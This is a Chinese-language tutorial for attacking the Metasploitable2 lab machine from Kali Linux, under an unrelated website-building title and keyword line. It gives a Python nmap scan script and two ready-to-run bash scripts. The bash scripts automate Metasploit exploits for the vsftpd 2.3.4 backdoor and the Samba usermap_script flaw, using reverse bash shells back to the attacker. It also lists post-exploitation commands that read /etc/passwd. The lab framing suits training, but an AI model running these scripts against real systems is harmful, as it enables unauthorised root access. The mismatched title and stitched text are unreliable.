企业官网建设流程全解析

中山手机网站建设报价,建筑教育培训网,海珠区住房和建设水务局网站,wordpress 获取tag名适用场景#xff1a;Kali Linux 环境#xff0c;hexstrike-ai-master 虚拟环境#xff0c;合法授权靶机 Metasploitable2核心思想#xff1a;先拿稳定结果#xff0c;再理解原理#xff1b;复杂步骤自动化#xff0c;一键搞定不踩坑一、前期准备#xff08;必做环节Kali Linux 环境hexstrike-ai-master 虚拟环境合法授权靶机 Metasploitable2核心思想先拿稳定结果再理解原理复杂步骤自动化一键搞定不踩坑一、前期准备必做环节缺一不可1. 环境基础验证确认 Kali 与靶机互通ping 192.168.1.4能通才算正常关闭 Kali 防火墙ufw disable避免拦截反向连接激活 hexstrike 虚拟环境可选保证工具依赖bash运行cd ~/hexstrike-ai-master source hexstrike-env/bin/activate安装必备工具apt install nmap metasploit-framework -y2. 信息收集渗透第一步先扫后打方法HexStrike 核心逻辑脚本复刻 AI 扫描创建扫描脚本hexstrike_scan.pypython运行import subprocess import sys def hexstrike_ai_scan(target_ip): print(f HexStrike AI 信息收集 - 目标{target_ip} ) nmap_cmd fnmap -sV -T4 -Pn -p 1-1000 {target_ip} try: scan_result subprocess.check_output(nmap_cmd, shellTrue, stderrsubprocess.STDOUT, encodingutf-8) print(扫描结果\n, scan_result) print(\n【关键漏洞识别】) print(- 21端口 vsftpd 2.3.4存在后门漏洞CVE-2011-2523) print(- 139/445端口 Samba 3.X存在命令执行漏洞CVE-2007-2447) except Exception as e: print(f扫描失败{e}) if __name__ __main__: hexstrike_ai_scan(192.168.1.4)运行脚本获取靶机信息python3 hexstrike_scan.py核心结果提取记录开放端口和对应服务版本确定可利用漏洞二、漏洞利用核心方案反向 Shell 一键脚本新手免踩坑核心原理反向 Shell 是靶机主动连接 Kali无需手动抢时间输入指令100% 稳定拿 root 权限是渗透测试的标准操作比交互 Shell 简单高效。方案 1vsftpd 2.3.4 后门漏洞一键脚本步骤 1创建脚本文件bash运行nano vsftpd_root_shell.sh步骤 2粘贴脚本内容全自动零修改bash运行#!/bin/bash # vsftpd 2.3.4 后门漏洞一键获取 root shell # 自动提取 Kali 本机 IPeth0 网卡 KALI_IP$(ip addr show eth0 | grep -oP (?inet\s)\d(\.\d){3} | head -n1) # 生成 Metasploit 自动攻击脚本 cat /tmp/vsftpd_auto.rc EOF use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 192.168.1.4 set PAYLOAD cmd/unix/reverse_bash set LHOST $KALI_IP set LPORT 9999 set ExitOnSession false # 防止会话自动关闭 run EOF # 执行攻击 echo 开始攻击 vsftpd 漏洞 echo Kali IP$KALI_IP | 监听端口9999 msfconsole -q -r /tmp/vsftpd_auto.rc # 清理临时文件 rm -f /tmp/vsftpd_auto.rc步骤 3赋予执行权限bash运行chmod x vsftpd_root_shell.sh步骤 4运行脚本全程无手动操作bash运行./vsftpd_root_shell.sh成功标志终端出现Command shell session 1 opened并弹出#提示符输入whoami输出root即为成功。后渗透操作拿到 shell 后执行bash运行whoami # 查看当前用户root ls /root # 查看 root 目录文件 cat /etc/passwd # 查看靶机用户列表 exit # 退出 shell 会话方案 2Samba 3.X 命令执行漏洞一键脚本步骤 1创建脚本文件bash运行nano samba_root_shell.sh步骤 2粘贴脚本内容bash运行#!/bin/bash # Samba 漏洞CVE-2007-2447一键获取 root shell KALI_IP$(ip addr show eth0 | grep -oP (?inet\s)\d(\.\d){3} | head -n1) cat /tmp/samba_auto.rc EOF use exploit/multi/samba/usermap_script set RHOSTS 192.168.1.4 set PAYLOAD cmd/unix/reverse_bash set LHOST $KALI_IP set LPORT 8888 set ExitOnSession false run EOF echo 开始攻击 Samba 漏洞 echo Kali IP$KALI_IP | 监听端口8888 msfconsole -q -r /tmp/samba_auto.rc rm -f /tmp/samba_auto.rc步骤 3赋予权限并运行bash运行chmod x samba_root_shell.sh ./samba_root_shell.sh成功标志同 vsftpd 漏洞终端弹出#提示符whoami输出root。三、常见问题与排查必记避免踩坑问题现象排查方法脚本运行后无会话建立1. 检查 Kali IP 是否正确ip addr show eth02. 确认靶机 IP 是 192.168.1.43. 换监听端口如 7777避免端口冲突端口被占用查看占用进程netstat -tulngrep 端口号br杀死进程kill -9 进程号 靶机无法连接 Kali1. 关闭 Kali 防火墙ufw disable2. 确认 Kali 与靶机在同一网段手动输入指令报错放弃手动输入直接用反向 Shell 一键脚本根本解决时机问题四、核心知识点总结复习重点渗透测试流程信息收集 → 漏洞识别 → 漏洞利用 → 后渗透 → 清理痕迹反向 Shell 优势靶机主动连 Kali无需手动交互会话稳定新手首选脚本万能模板自动查 IP → 生成 msf 脚本 → 一键运行 → 清理临时文件关键注意事项仅在合法授权靶机操作禁止攻击非授权设备每个漏洞用不同监听端口避免冲突拿到 shell 后先执行whoami确认权限五、进阶玩法适合爱折腾的你脚本菜单整合把 vsftpd、Samba 脚本整合到一个hack_menu.sh运行后选数字攻击对应漏洞日志记录功能在脚本中添加 hack.log把攻击结果保存到日志文件方便复习多漏洞同时攻击修改端口号同时运行多个脚本获取多个 root shell 会话